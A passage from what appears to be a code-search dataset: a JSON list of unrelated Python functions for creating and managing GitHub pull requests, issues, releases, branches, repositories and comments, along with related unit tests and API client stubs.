headers=headers)\n if request.status_code == 403 and request.headers['X-RateLimit-Remaining'] == '0':\n click.secho('You have exceeded the GitHub API rate limit. Try again in about an hour.')\n if not token:\n click.secho('Or try running this again, providing an access token:')\n click.secho('$ nox-review pr --token=YOUR_TOKEN_HERE {}'.format(pr))\n sys.exit(1)\n payload = request.json()\n click.echo('=== Reviewing PR {} : {}'.format(\n click.style(pr, bold=True),\n click.style(payload.get('title', '(n/a)'), bold=True)))\n\n base_ref = payload['base']['ref']\n\n repo = get_repo()\n\n click.echo('==> Fetching base ({})'.format(base_ref))\n base_refspec = 'heads/{}'.format(payload['base']['ref'])\n repo.fetch(base_refspec)\n base = repo.sha('FETCH_HEAD')\n\n click.echo('==> Fetching PR')\n head_refspec = 'pull/{}/head'.format(pr)\n repo.fetch(head_refspec)\n head = repo.sha('FETCH_HEAD')\n\n if merge:\n click.echo('==> Fetching extra history for merging')\n depth = 10\n while not repo.merge_base(head, base):\n repo.fetch(base_refspec, depth=depth)\n repo.fetch(head_refspec, depth=depth)\n depth *= 2\n\n # It looks like this isn't enough for a merge, so we fetch more\n repo.fetch(base_refspec, depth=depth)\n\n click.echo('==> Merging PR into base')\n\n repo.checkout(base)\n repo.git(['merge', head, '--no-ff', '-qm', 'Nox automatic merge'])\n merged = repo.sha('HEAD')\n\n old = base\n new = merged\n\n else:\n commits = requests.get(payload['commits_url'], headers=headers).json()\n old = commits[-1]['parents'][0]['sha']\n new = payload['head']['sha']\n\n build_difference(old, new, extra_args=ctx.obj['extra-args'], with_tests=ctx.obj[\"tests\"], disable_test_blacklist=ctx.obj[\"no-blacklist\"], dry_run=ctx.obj['dry_run'])", "def test_create(client):\n rv = create(client, reponame='Michael', url='https://github.com/Michael')\n assert json.loads(rv.data.decode())['code'] == 0\n assert json.loads(rv.data.decode())['owner'] == 'Michael'\n assert json.loads(rv.data.decode())['url'] == 'https://github.com/Michael'", "def create_release(ctx, sha):\n\n try:\n\n gh = ctx.obj.github\n\n log.echo('Creating a GitHub release')\n release = gh.create_release(sha=sha)\n log.echo('Release created: {}'.format(release.url))\n return release\n\n except exceptions.SetupPyNotFoundException as e:\n e.possible_solutions = [solutions.create_setup_py()]\n raise", "def callback_repo_create(self, request, uri, headers, status_code=201):\n # Disabling unused-argument because this is a callback with\n # required method signature.\n # pylint: disable=unused-argument\n self.assertEqual(\n request.headers['Authorization'],\n 'token {0}'.format(self.OAUTH2_TOKEN)\n )\n repo_dict = json.loads(request.body)\n self.assertTrue(\n repo_dict['name'] in [self.TEST_REPO, self.TEST_RERUN_REPO]\n )\n self.assertEqual(repo_dict['description'], self.TEST_DESCRIPTION)\n self.assertEqual(repo_dict['private'], True)\n\n return (status_code, headers, json.dumps({'html_url': 'testing'}))", "def create_issue(self, issue_field_dict, assign_current_user=False):\r\n issue_field_dict = eval(str(issue_field_dict))\r\n print issue_field_dict\r\n\r\n new_issue = self.jira.create_issue(issue_field_dict)\r\n if assign_current_user is True:\r\n self.assign_user_to_issue(new_issue, self.jira.current_user())\r\n return new_issue", "def create_new_python_project():\n\t# Create the different variables\n\tfolder_name = str(sys.argv[1])\n\tdir_name = my_project_folder + folder_name\n\tpy_file = dir_name + '/' + folder_name + '.py'\n\treadme_file = dir_name + '/' 
+ 'README.md'\n\ttodo_file = dir_name + '/' + 'TODO.txt'\n\n\t# Create directory if it does not exist yet\n\tif not os.path.exists(dir_name):\n\t\tos.mkdir(dir_name)\n\t\tprint(\"Directory \" , dir_name , \" Created \")\n\n\t\t# Create Python file\n\t\tdata = ''\n\t\twith open(template_py, 'r') as file:\n\t\t\tdata += file.read()\n\n\t\twith open(py_file, 'w') as f:\n\t\t\tf.write(data)\n\t\t\tprint(\"Python file created\")\n\n\t\t# Create README file\n\t\tdata = ''\n\t\twith open(template_readme, 'r') as file:\n\t\t\tdata += file.read()\n\n\t\twith open(readme_file, 'w') as f:\n\t\t\tf.write(data)\n\t\t\tprint(\"Readme file created\")\n\n\t\t# Create Todo file\n\t\twith open(todo_file, 'w') as f:\n\t\t\tprint(\"TODO file created\")\n\n\t\t# Create Github repo\n\t\twith open(\".env\", \"r\") as f:\n\t\t\tdata = f.read()\n\n\t\tindex_1 = data.find('TOKEN=\"') + len('TOKEN=\"')\n\t\ttoken = data[index_1:-1]\n\t\tg = Github(token)\n\t\tuser = g.get_user()\n\t\trepo = user.create_repo(folder_name)\n\t\tprint(\"Succesfully created repository {}\".format(folder_name))\n\n\n\telse: \n\t\tprint(\"Directory \" , dir_name , \" already exists\")", "def create_from_git(self, token: Any, repo: str):\n params = [token, repo, ]\n method = \"ProjectAPI.CreateFromGit\"\n self.__add_request(method, params, lambda payload: Definition.from_json(payload))", "def _make_new(request, form):\n if not form.is_valid():\n return (None, None)\n account = models.Account.get_account_for_user(request.user)\n if account.blocked:\n # Early exit for blocked accounts.\n return (None, None)\n\n data_url = _get_data_url(form)\n if data_url is None:\n return (None, None)\n data, url, separate_patches = data_url\n\n reviewers = _get_emails(form, 'reviewers')\n if not form.is_valid() or reviewers is None:\n return (None, None)\n\n cc = _get_emails(form, 'cc')\n if not form.is_valid():\n return (None, None)\n\n base = form.get_base()\n if base is None:\n return (None, None)\n\n first_issue_id, _ = models.Issue.allocate_ids(1)\n issue_key = ndb.Key(models.Issue, first_issue_id)\n\n issue = models.Issue(subject=form.cleaned_data['subject'],\n description=form.cleaned_data['description'],\n project=form.cleaned_data['project'],\n base=base,\n repo_guid=form.cleaned_data.get('repo_guid', None),\n reviewers=reviewers,\n cc=cc,\n private=form.cleaned_data.get('private', False),\n n_comments=0,\n key=issue_key)\n issue.put()\n\n first_ps_id, _ = models.PatchSet.allocate_ids(1, parent=issue.key)\n ps_key = ndb.Key(models.PatchSet, first_ps_id, parent=issue.key)\n patchset = models.PatchSet(issue_key=issue.key, data=data, url=url, key=ps_key)\n patchset.put()\n\n if not separate_patches:\n try:\n patches = engine.ParsePatchSet(patchset)\n except:\n # catch all exceptions happening in engine.ParsePatchSet,\n # engine.SplitPatch. With malformed diffs a variety of exceptions could\n # happen there.\n logging.exception('Exception during patch parsing')\n patches = []\n if not patches:\n patchset.key.delete()\n issue.key.delete()\n errkey = url and 'url' or 'data'\n form.errors[errkey] = ['Patch set contains no recognizable patches']\n return (None, None)\n\n ndb.put_multi(patches)\n\n if form.cleaned_data.get('send_mail'):\n msg = _make_message(request, issue, '', '', True)\n issue.put()\n msg.put()\n return (issue, patchset)", "def post_to_github(report, user=None, pw=None, proxies=None):\n proxies = proxies or dict()\n # Determine authentication method. 
No username or password search for\n # configuration file with GITHUB section\n if not user and not pw:\n # Find configuration file\n cfg = ConfigParser()\n cfgs = cfg.read(['web.cfg', '.web.cfg',\n os.path.expanduser('~/.web.cfg'),\n 'qs.cfg', '.qs.cfg',\n os.path.expanduser('~/.qs.cfg')])\n if cfgs:\n # Grab login information\n try:\n user = cfg.get('GITHUB', 'user')\n pw = cfg.get('GITHUB', 'pw')\n except (NoOptionError, NoSectionError):\n logger.debug('No GITHUB section in configuration file '\n 'with user and pw entries')\n # Grab proxy information if we will be using web.cfg\n if (user or pw) and not proxies:\n try:\n proxy_name = cfg.get('GITHUB', 'proxy')\n logger.debug(\"Using proxy host %s\", proxy_name)\n proxies = {'https': proxy_name}\n except NoOptionError:\n logger.debug(\"No proxy information found\")\n # No valid configurations\n else:\n logger.debug('No \"web.cfg\" file found')\n # Manually ask if we didn't get the username or password already\n if not user:\n user = input('Github Username: ')\n if not pw:\n pw = getpass.getpass('Password for GitHub Account {}: '\n ''.format(user))\n # Our url to create issues via POST\n url = 'https://api.github.com/repos/pcdshub/Bug-Reports/issues'\n # Create the body of the template\n env = Environment(loader=PackageLoader('hutch_python'),\n trim_blocks=True, lstrip_blocks=True)\n template = env.get_template('issue.template')\n body = template.render(report)\n # Requests session\n session = requests.Session()\n session.auth = (user, pw)\n session.proxies.update(proxies)\n issue = {'title': report['title'],\n 'body': body,\n 'assignee': None,\n 'milestone': None,\n 'labels': []} # TODO: Determine hutch to create issue for\n # Post to GitHub\n r = session.post(url, simplejson.dumps(issue))\n if r.status_code == 201:\n logger.info(\"Succesfully created GitHub issue\")\n else:\n logger.exception(\"Could not create GitHub issue. 
HTTP Status Code: %s\",\n r.status_code)", "async def createComment(self, *args, **kwargs):\n\n return await self._makeApiCall(self.funcinfo[\"createComment\"], *args, **kwargs)", "def open_pr(forked_repo, base_branch, cherry_pick_branch):\n url = f\"https://github.com/python/cpython/compare/{base_branch}...{forked_repo}:{cherry_pick_branch}?expand=1\"\n webbrowser.open_new_tab(url)", "def create_or_update_comment(comment, message, repo, pr_number, token):\n # repo is in the form of \"org/repo\"\n if comment is not None:\n print(\"updating existing comment\")\n # API doc: https://docs.github.com/en/rest/issues/comments?apiVersion=2022-11-28#update-an-issue-comment # noqa\n response = requests.patch(\n f\"https://api.github.com/repos/{repo}/issues/comments/{comment['id']}\",\n headers=get_headers(token),\n json={\"body\": message},\n )\n else:\n print(\"creating new comment\")\n # API doc: https://docs.github.com/en/rest/issues/comments?apiVersion=2022-11-28#create-an-issue-comment # noqa\n response = requests.post(\n f\"https://api.github.com/repos/{repo}/issues/{pr_number}/comments\",\n headers=get_headers(token),\n json={\"body\": message},\n )\n\n response.raise_for_status()", "def _MakeCreateRequest(args, messages, resources, project,\n future_reservation_ref):\n future_reservation = util.MakeFutureReservationMessageFromArgs(\n messages, resources, args, future_reservation_ref)\n future_reservation.description = args.description\n future_reservation.namePrefix = args.name_prefix\n\n return messages.ComputeFutureReservationsInsertRequest(\n futureReservation=future_reservation,\n project=project,\n zone=future_reservation_ref.zone)", "def main():\n\n default_token = os.getenv('GITHUB_API_TOKEN')\n\n parser = argparse.ArgumentParser(\n formatter_class=argparse.RawDescriptionHelpFormatter,\n description=\"\"\"\nShow PRs or a specific PR\n\n github-pr list -r dataxu/test_repo\n github-pr list -r dataxu/test_repo -n 17\n\n - Filters - can be used alone or together\n --filters\n * owner - This will return a list of PRs from the repo that are owned by the github-user\n * status - returns PRs with a specifc status, one of (success, failure, error, pending)\n * label - returns PRs with a specifc label\n * comment - returns PRs that have at least one comment matching a given string\n github-pr list -r dataxu/test_repo --filters 'filter1_name=filter1_value,filter2_name=filter2_value'\n\n github-pr list -r dataxu/test_repo --filters 'owner=frankenstein,status=success,comment=:pitchfork:'\n This returns the number of all PRs in the given repo owned by frankenstein with the status success and containing any comments that have \":pitchfork:\"\n\nCreate a PR\n\n github-pr create -r dataxu/test_repo -t \"PR Title\" --head \"my-test-branch\" --body 'Description Line 1<br/>Line2'\n\nCreate a PR from a fork\n\n github-pr create -r dataxu/test_repo -t \"PR Title\" --head \"my-fork:my-test-branch\"\n\nComment on a PR\n\n github-pr comment -r dataxu/test_repo -n 17 --body \":shipit:\"\n\nMerge a PR by PR number\n\n github-pr merge -r dataxu/test_repo -n 17\n\n github-pr merge -r dataxu/test_repo -n 17 --condition-non-owner-merger --condition-approved-mergers-file=.approved-mergers-file\n This conditional option allows merges to go through checks that validate ownership and team hierarchy.\n ie.\n --condition-approved-mergers user1 user2 user3\n This takes a SPACE-separated list, without quotes or braces\n or\n --condition-approved-mergers-file=.approved-mergers-file\n OPTIONAL: --mergecomment can be set to a 
different string to search for instead of \":shipit:\"\n\nMerge a PR by branch\n\n github-pr merge -r dataxu/test_repo --head dev-my-branch-name\n github-pr merge -r dataxu/test_repo --head dev-another-branch --base branch-that-is-not-master\n\nDelete a PR\n\n github-pr delete -r dataxu/test_repo -n 17\n\nCheck conditional status checks\n !!!This check only looks at comments AFTER the latest commit, to validate that the\n most recent code (most recent git sha pushed to the PR) has been peer reviewed!!!\n\n github-pr check-condition -r dataxu/dcommand -n 84 --condition-non-owner-merger\n This will check to make sure that the owner can not apply a shipable comment on their own code\n github-pr check-condition -r dataxu/dcommand -n84 --condition-approved-mergers-file=<MAINTAINERS FILE>\n This takes the path to the MAINTAINERS file inside the repo\n Compares commenter to list from a file, single user per line, and checks to make sure they are an approved merger\n github-pr check-condition -r dataxu/dcommand -n 84 --condition-approved-mergers ned_flanders marge_simpson\n This takes a SPACE-separated list, without quotes or braces\n This will check that a comment containing a :shipit: (the default, or other defined comment if merge_comment is set)\n comes from a user in the provided list passed on the commandline. The \"MAINTAINERS file\" option above is the preferred\n convention to use, while this passing the list on the commandline option is primarily for local testing\n when setting up your CD flow.\n \"\"\")\n parser.add_argument('action', choices=['create', 'list', 'merge', 'comment', 'delete', 'update', 'check-condition'], help='action to take')\n parser.add_argument('-r', '--repo', required=True, help='the owner/name of the repository')\n parser.add_argument('-t', '--title', help='the title of the pr')\n parser.add_argument('-f', '--files', action='store_true', default=False, help='list files in the PR')\n parser.add_argument('-n', '--number', type=int, help='pr number')\n parser.add_argument('-l', '--label', nargs='+', help='label(s) to add/apply to the pr (one or more, space separated), or find a list of prs with matching labels (with list action)')\n parser.add_argument('-c', '--comments', action='store_true', help='added to list, to return list of comments')\n parser.add_argument('--filters', help='add this to the list function with collection of options you want to filter your results for', type=str)\n parser.add_argument('--base', default='master', help='branch the pr is against')\n parser.add_argument('--head', help='branch the pr is of')\n parser.add_argument('--body', default='', help='the description of the pr')\n parser.add_argument('--replacelabels', action='store_true', help='replace ALL labels during an update')\n parser.add_argument('--token', default=default_token, help='api token to use')\n parser.add_argument('--numberonly', action='store_true', help='only return the numbers of the PRs during the list action')\n parser.add_argument('--table', action='store_true', help='show a table of output instead of pretty. not compatible with numberonly')\n parser.add_argument('--tableformat', default='simple', help='format of table to use')\n parser.add_argument('--noheaders', action='store_true', help='remove headers from table view. 
best for programmatic use of this script')\n parser.add_argument('--noratelimit', action='store_true', help=\"don't show the rate limit\")\n parser.add_argument('--mergecomment', default=\":shipit:\", help='string to look for when checking comments for \"shipit\" approval, during MERGE only')\n parser.add_argument('--condition-non-owner-merger', action='store_true', help='stops owner from being able to apply merge comment')\n parser.add_argument('--condition-approved-mergers', default=None, nargs='+', help='list of usernames of approved mergers')\n parser.add_argument('--condition-approved-mergers-file', action='store_true', help='check a file for list of usernames of approved mergers')\n parser.add_argument('--approved-mergers-file-path', default='./MAINTAINERS.txt', help='location of file of usernames of approved mergers')\n parser.add_argument('-v', '--verbose', const=1, default=0, type=int, nargs=\"?\",\n help=\"Logger verbosity: 0 = WARN (default), 1 = INFO, 2 = DEBUG\")\n\n args = vars(parser.parse_args())\n logging.basicConfig(format=\"%(asctime)s %(levelname)-7s %(filename)20s:%(lineno)-4d | %(message)s\")\n\n if args['verbose'] == 0:\n logger.setLevel(logging.WARN) \n elif args['verbose'] == 1:\n logger.setLevel(logging.INFO) \n elif args['verbose'] == 2:\n logger.setLevel(logging.DEBUG)\n\n if 'action' in args and args['action'] == 'create':\n github_create_pr(**args)\n\n elif 'action' in args and args['action'] == 'list':\n github_list_prs(**args)\n\n elif 'action' in args and args['action'] == 'merge':\n if 'number' in args and args['number']:\n github_merge_pr_by_number(**args)\n else:\n github_merge_pr_by_branch(**args)\n\n elif 'action' in args and args['action'] == 'comment':\n github_comment_pr(**args)\n\n elif 'action' in args and args['action'] == 'delete':\n github_delete_pr(**args)\n\n elif 'action' in args and args['action'] == 'update':\n github_update_pr(**args)\n\n elif 'action' in args and args['action'] == 'check-condition':\n github_check_condition(**args)\n\n gh = Github(args['token'])\n\n if (('numberonly' in args) and not args['numberonly']):\n if (('noratelimit' in args) and not args['noratelimit']):\n print \"Github Rate Limiting: %d remaining of max %d\" % (gh.rate_limiting[0], gh.rate_limiting[1])", "def pullrequest(self):\n target = self.get_data(\"target\")\n if target[\"type\"] == \"pipeline_pullrequest_target\":\n return PullRequest(\n target[\"pullrequest\"][\"links\"][\"self\"][\"href\"],\n target[\"pullrequest\"],\n **self._new_session_args\n ) # fmt: skip\n else:\n return None", "def create_branch(ctx, name, sha):\n\n try:\n\n gh = ctx.obj.github\n\n log.echo('Creating branch...', break_line=False)\n branch = gh.create_branch(name=name, sha=sha)\n log.checkmark()\n log.echo('Branch {} created at {}'.format(name, sha))\n return branch\n except BaseException as _:\n log.xmark()\n raise", "def _create_issue(*, image: str, repo: str, run: str, stacktrace: str) -> Issue:\n title = f\"Automatic error report from {repo}\"\n body = _report_body(image=image, repo=repo, run=run, stacktrace=stacktrace)\n return TAGBOT_ISSUES_REPO.create_issue(title, body)", "def test_valid_pull_request(self):\n with tempfile.TemporaryDirectory() as tmp_dir:\n out_path = os.path.join(tmp_dir, 'out')\n os.mkdir(out_path)\n self.assertTrue(\n cifuzz.build_fuzzers(EXAMPLE_PROJECT,\n 'oss-fuzz',\n tmp_dir,\n pr_ref='refs/pull/1757/merge'))\n self.assertTrue(\n os.path.exists(os.path.join(out_path, EXAMPLE_BUILD_FUZZER)))", "def test_create_an_issue(self):\n url = 
reverse('bulletin:issue-create',\n kwargs={'pk': self.newsletter.id})\n response = self.client.get(url,\n follow=True)\n self.assertEqual(response.status_code, 200)\n\n initial_num_newsletter_issues = self.newsletter.issues.count()\n url = reverse('bulletin:issue-create',\n kwargs={'pk': self.newsletter.id})\n response = self.client.post(url,\n data={'pub_date': '2014-10-04',\n 'name': 'Excellent issue'},\n follow=True)\n self.assertEqual(response.status_code, 200)\n self.assertEqual(self.newsletter.issues.count(),\n initial_num_newsletter_issues + 1)", "def create_release(config, args):\n yield config.repo.create_release(args.tag_name, name=args.name,\n target_commitish=args.get(\"target_commitish\"), body=args.get(\"body\"),\n draft=args.get_bool(\"draft\"), prerelease=args.get_bool(\"prerelease\"))", "def create_pr_notification(package, repository, id):\n # type: (str, str, int) -> str\n notification_dict = {\n \"repository\": repository,\n \"package\": package,\n \"event\": \"pull-request\",\n \"id\": id\n }\n return json.dumps(notification_dict)", "def create_request(self, config):\n self.logger.info(\"Injecting request args:\\n%s ...\", config.request_args[\"createRequest\"])\n json_args = json.dumps(config.request_args[\"createRequest\"])\n urn = self.urn_prefix + \"/request\"\n status, data = self.http_request(\"POST\", urn, data=json_args,\n headers=self.headersBody)\n if status > 216:\n self.logger.error(\"Failed to create request with status: %s, data: %s\", status, data)\n sys.exit(1)\n data = json.loads(data)\n self.logger.info(data)\n request_name = data[\"result\"][0][\"request\"]\n self.approve_request(request_name)\n self.logger.info(\"Create request '%s' succeeded.\", request_name)\n\n config.request_names = request_name\n\n return request_name", "def api_github_message():\n if request.headers['Content-Type'] == 'application/json':\n print('inside server ')\n my_info = json.dumps(request.json)\n payload = json.loads(my_info)\n if not payload['action'] == 'closed':\n model = StoreModel().loadData()\n tdf = TestData()\n tdf1 = TestData1()\n parameter_dict = tdf.fetcher(my_info)\n extension_file = tdf1.file_fetcher(my_info)\n feature_dict = parameter_dict['feature_dict']\n comment_url = parameter_dict['comment_url']\n comment_body = tdf.test_feeder(feature_dict, model)\n file_comment_body = tdf1.file_test_feeder(extension_file[0], extension_file[1])\n Comment.post_comment(comment_url, comment_body)\n Comment.post_comment(comment_url, str(file_comment_body))\n app.logger.info(comment_body)\n prediction_response = json.dumps({\"state\": comment_body})\n app.logger.info(comment_body)\n res = Response(prediction_response, status=200, mimetype='application.json')\n return res\n prediction_response = json.dumps({\"state\": \"closed pull request\"})\n app.logger.info(\"closed pull request\")\n res = Response(prediction_response, status=200, mimetype='application.json')\n return res", "def cmd_create(self):\n self.repo.create()\n\n # Add .gitignore.\n self.repo.add_files({'.gitignore': '.swp\\n'}, FIRST_COMMIT_MSG)\n\n # Create the etc and timestamps branches.\n self.repo.checkout('etc', create=True)\n self.repo.checkout('timestamps', create=True)\n\n self.repo.checkout('master')\n self.repo.init()\n self.update_repository()\n print('Git repository created at %s' % self.repodir)", "def test_project_creation(self):\n title = 'Project title'\n code = 'SCW-12345'\n project = self.create_project(\n title=title,\n code=code,\n institution=self.institution,\n 
tech_lead=self.project_owner,\n category=self.category,\n funding_source=self.funding_source,\n )\n self.assertTrue(isinstance(project, Project))\n self.assertEqual(project.__str__(), code + ' - ' + title)\n self.assertEqual(project.status, Project.AWAITING_APPROVAL)\n self.assertEqual(project.title, title)\n self.assertEqual(project.code, code)\n self.assertTrue(project.awaiting_approval())", "def test_create_with_new_draft_and_custom_changedesc(self):\n review_request = self.create_review_request(\n publish=True,\n bugs_closed='1,20,300',\n commit_id='abc123',\n description_rich_text=True,\n rich_text=True,\n testing_done_rich_text=True,\n extra_data={\n 'key': {\n 'values': [1, 2, 3],\n },\n 'mybool': True,\n })\n\n # Create the draft.\n changedesc = ChangeDescription.objects.create()\n orig_draft = ReviewRequestDraft.create(review_request,\n changedesc=changedesc)\n\n self.assertEqual(orig_draft.changedesc_id, changedesc.pk)\n self.assertEqual(ChangeDescription.objects.count(), 1)\n\n # Reload to be sure.\n draft = ReviewRequestDraft.objects.get(pk=orig_draft.pk)\n self.assertEqual(orig_draft, draft)\n self.assertEqual(draft.changedesc, changedesc)", "def create_new(self, name):\n validate_name(name, self.__class__.__name__)\n self.data = {\n \"author_name\": \"\",\n \"author_email\": \"\",\n \"git_profile_url\": \"\",\n \"starting_version\": \"0.1.0\",\n \"default_description\": \"My project, created using nusex\",\n \"preferred_license\": \"unlicense\",\n }", "def create(self, request, *args, **kwargs):\n project = Project.objects.get(id=kwargs[\"projects_pk\"])\n self.check_object_permissions(request, project)\n\n serializer = self.get_serializer(data=request.data)\n if serializer.is_valid():\n serializer.save(permission=\"contributor\", role=\"Contributor\")\n return Response(serializer.data, status=status.HTTP_201_CREATED)\n\n return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)", "async def new_label(event, gh, *args, **kwargs):\n if event.data[\"label\"][\"name\"] == TRIVIAL_LABEL:\n issue_number_found = ISSUE_RE.search(\n event.data[\"pull_request\"][\"title\"])\n if issue_number_found:\n status = create_success_status(issue_number_found)\n else:\n status = TRIVIAL_STATUS\n await _post_status(event, gh, status)", "def create_new_test_run():\n if debug:\n print('[DEBUG] Func: create_new_test_run...')\n\n new_test_run_url = \"https://eei.testrail.com/index.php?/api/v2/add_run/{0}=\".format(project_id)\n\n new_test_run_json = {\n \"suite_id\": suite_id,\n \"name\": suite_name,\n \"assignedto_id\": assignedto_id,\n \"include_all\": False,\n \"case_ids\": [testcase_id]\n }\n\n new_test_run = requests.post(new_test_run_url, auth=authorization, json=new_test_run_json)\n\n if str(new_test_run.status_code) != '200':\n print('[ERROR] new_test_run: non 200 status code... 
' + str(new_test_run.status_code))\n print(str(new_test_run.json()))\n sys.exit(1)\n\n global new_test_run_id\n new_test_run_id = str(new_test_run.json()[\"id\"])", "async def create_from_git(self, token: Any, repo: str) -> Definition:\n response = await self._invoke({\n \"jsonrpc\": \"2.0\",\n \"method\": \"ProjectAPI.CreateFromGit\",\n \"id\": self.__next_id(),\n \"params\": [token, repo, ]\n })\n assert response.status // 100 == 2, str(response.status) + \" \" + str(response.reason)\n payload = await response.json()\n if 'error' in payload:\n raise ProjectAPIError.from_json('create_from_git', payload['error'])\n return Definition.from_json(payload['result'])", "def openNewIssueUrl(self):\r\n url = QUrl(\"https://github.com/Freeseer/freeseer/issues/new\")\r\n QDesktopServices.openUrl(url)", "def repository_create_hosted():\n pass", "def create(self, name, scm=None, is_private=False):\r\n params = base.get_params(('name', 'scm'), locals())\r\n params['is_private'] = 'true' if is_private else 'false'\r\n request = http.Request('POST', self.get_url(), params)\r\n\r\n return request, parsers.parse_json", "def newTask(name, description, assigner, id=None, priority=None, submitter_email=None, whose=None):\n if whose:\n user_id = jutdaapi.find_user(whose)\n if not user_id:\n raise ValueError('bad whose assignment: '+str(whose))\n #title = name + ' for: '+assigner.title()\n # that was the old scheme\n title = '('+assigner.title()+') '+name\n\n if priority != None:\n #priority = (int(priority) + 2) / 2\n priority = int(priority)\n RA_queue = 3\n #if assigner != 'no one':\n # description += '<tasktrackermeta assigner=\"'+assigner+'\"/>'\n if isinstance(id, str):\n description += '<tasktrackermeta id=\"'+id+'\"/>'\n ticket_id = jutdaapi.create_ticket(RA_queue, title, description,\n priority=priority, submitter_email=submitter_email)\n # Is there a race condition here? 
In this kind of database\n # I would assume not.\n time.sleep(1)\n ticket = jutdaapi.get_detailed_ticket(ticket_id)\n t = ticketToTask(ticket)\n return t", "def create_release(\n self,\n ) -> Callable[[cloud_deploy.CreateReleaseRequest], operations_pb2.Operation]:\n # Generate a \"stub function\" on-the-fly which will actually make\n # the request.\n # gRPC handles serialization and deserialization, so we just need\n # to pass in the functions for each.\n if \"create_release\" not in self._stubs:\n self._stubs[\"create_release\"] = self.grpc_channel.unary_unary(\n \"/google.cloud.deploy.v1.CloudDeploy/CreateRelease\",\n request_serializer=cloud_deploy.CreateReleaseRequest.serialize,\n response_deserializer=operations_pb2.Operation.FromString,\n )\n return self._stubs[\"create_release\"]", "def post(self):\n if not request.json:\n return None, 400\n\n created_git_repository: GitRepositoryModel = self.datastore.create(document=request.json)\n return created_git_repository, 201", "def collection_post(request):\n user_id = request.validated['contributor_id']\n user = request.contract.get_user(user_id)\n contribution_type = request.validated['type']\n try:\n contribution = request.contract.create_contribution(user=user, contribution_type=contribution_type)\n except InvalidContributionTypeError as error:\n raise exc.HTTPBadRequest(error)\n return contribution_to_dict(contribution)", "def submitBuildRequest(ss, reason, props=None, now=False):", "def test_build_new_review_request_on_enterprise_travis(self):\n repository = self._create_repository()\n review_request = self.create_review_request(repository=repository)\n diffset = self.create_diffset(review_request=review_request)\n diffset.base_commit_id = '8fd69d70f07b57c21ad8733c1c04ae604d21493f'\n diffset.save()\n\n config = self._create_config(enterprise=True)\n self.integration.enable_integration()\n\n data = self._spy_on_make_request()\n\n review_request.publish(review_request.submitter)\n\n self.assertTrue(TravisAPI._make_request.called)\n\n self.assertEqual(\n data['url'],\n 'https://travis.example.com/api/repo/'\n 'mypublicorg%2Fmypublicorgrepo/requests')\n\n self.assertEqual(\n data['request']['config']['env']['global'],\n [\n 'REVIEWBOARD_STATUS_UPDATE_ID=1',\n 'REVIEWBOARD_TRAVIS_INTEGRATION_CONFIG_ID=%d' % config.pk,\n ])\n self.assertEqual(data['request']['message'],\n 'Test Summary\\n\\nTest Description')\n self.assertTrue('git checkout %s' % diffset.base_commit_id\n in data['request']['config']['before_install'])\n self.assertEqual(data['request']['branch'], 'review-requests')", "def get_pull_request(project, num, github_api=3):\r\n if github_api==2 :\r\n url = \"http://github.com/api/v2/json/pulls/{project}/{num}\".format(project=project, num=num)\r\n elif github_api == 3:\r\n url = \"https://api.github.com/repos/{project}/pulls/{num}\".format(project=project, num=num)\r\n response = requests.get(url)\r\n response.raise_for_status()\r\n if github_api == 2 :\r\n return json.loads(response.text)['pull']\r\n return json.loads(response.text)", "def create(ctx):\n pass", "def pull_requests_model(self, entry_info, repo_id):\n github_url = entry_info['given']['github_url']\n\n logging.info('Beginning collection of Pull Requests...\\n')\n logging.info(f'Repo ID: {repo_id}, Git URL: {github_url}\\n')\n record_model_process(self, repo_id, 'pull_requests')\n\n owner, repo = self.get_owner_repo(github_url)\n\n url = (f'https://api.github.com/repos/{owner}/{repo}/pulls?state=all&' +\n 'direction=asc&per_page=100&page={}')\n\n # Get pull requests 
that we already have stored\n # Set pseudo key (something other than PK) to \n # check dupicates with\n table = 'pull_requests'\n table_pkey = 'pull_request_id'\n update_col_map = {'pr_src_state': 'state'} \n duplicate_col_map = {'pr_src_id': 'id'}\n\n #list to hold pull requests needing insertion\n prs = paginate(self, url, duplicate_col_map, update_col_map, table, table_pkey, \n where_clause='WHERE repo_id = {}'.format(repo_id),\n value_update_col_map={'pr_augur_contributor_id': float('nan')})\n\n # Discover and remove duplicates before we start inserting\n logging.info(\"Count of pull requests needing update or insertion: \" + str(len(prs)) + \"\\n\")\n\n for pr_dict in prs:\n\n pr = {\n 'repo_id': repo_id,\n 'pr_url': pr_dict['url'],\n 'pr_src_id': pr_dict['id'],\n 'pr_src_node_id': None,\n 'pr_html_url': pr_dict['html_url'],\n 'pr_diff_url': pr_dict['diff_url'],\n 'pr_patch_url': pr_dict['patch_url'],\n 'pr_issue_url': pr_dict['issue_url'],\n 'pr_augur_issue_id': None,\n 'pr_src_number': pr_dict['number'],\n 'pr_src_state': pr_dict['state'],\n 'pr_src_locked': pr_dict['locked'],\n 'pr_src_title': pr_dict['title'],\n 'pr_augur_contributor_id': find_id_from_login(self, pr_dict['user']['login']),\n 'pr_body': pr_dict['body'],\n 'pr_created_at': pr_dict['created_at'],\n 'pr_updated_at': pr_dict['updated_at'],\n 'pr_closed_at': pr_dict['closed_at'],\n 'pr_merged_at': pr_dict['merged_at'],\n 'pr_merge_commit_sha': pr_dict['merge_commit_sha'],\n 'pr_teams': None,\n 'pr_milestone': pr_dict['milestone']['title'] if pr_dict['milestone'] else None,\n 'pr_commits_url': pr_dict['commits_url'],\n 'pr_review_comments_url': pr_dict['review_comments_url'],\n 'pr_review_comment_url': pr_dict['review_comment_url'],\n 'pr_comments_url': pr_dict['comments_url'],\n 'pr_statuses_url': pr_dict['statuses_url'],\n 'pr_meta_head_id': None,\n 'pr_meta_base_id': None,\n 'pr_src_issue_url': pr_dict['issue_url'],\n 'pr_src_comments_url': pr_dict['comments_url'], # NOTE: this seems redundant\n 'pr_src_review_comments_url': pr_dict['review_comments_url'], # this too\n 'pr_src_commits_url': pr_dict['commits_url'], # this one also seems redundant\n 'pr_src_statuses_url': pr_dict['statuses_url'],\n 'pr_src_author_association': pr_dict['author_association'],\n 'tool_source': self.tool_source,\n 'tool_version': self.tool_version,\n 'data_source': 'GitHub API'\n }\n\n if pr_dict['flag'] == 'need_insertion':\n logging.info(f'PR {pr_dict[\"id\"]} needs to be inserted\\n')\n\n result = self.db.execute(self.pull_requests_table.insert().values(pr))\n logging.info(f\"Added Pull Request: {result.inserted_primary_key}\")\n self.pr_id_inc = int(result.inserted_primary_key[0])\n\n elif pr_dict['flag'] == 'need_update':\n result = self.db.execute(self.pull_requests_table.update().where(\n 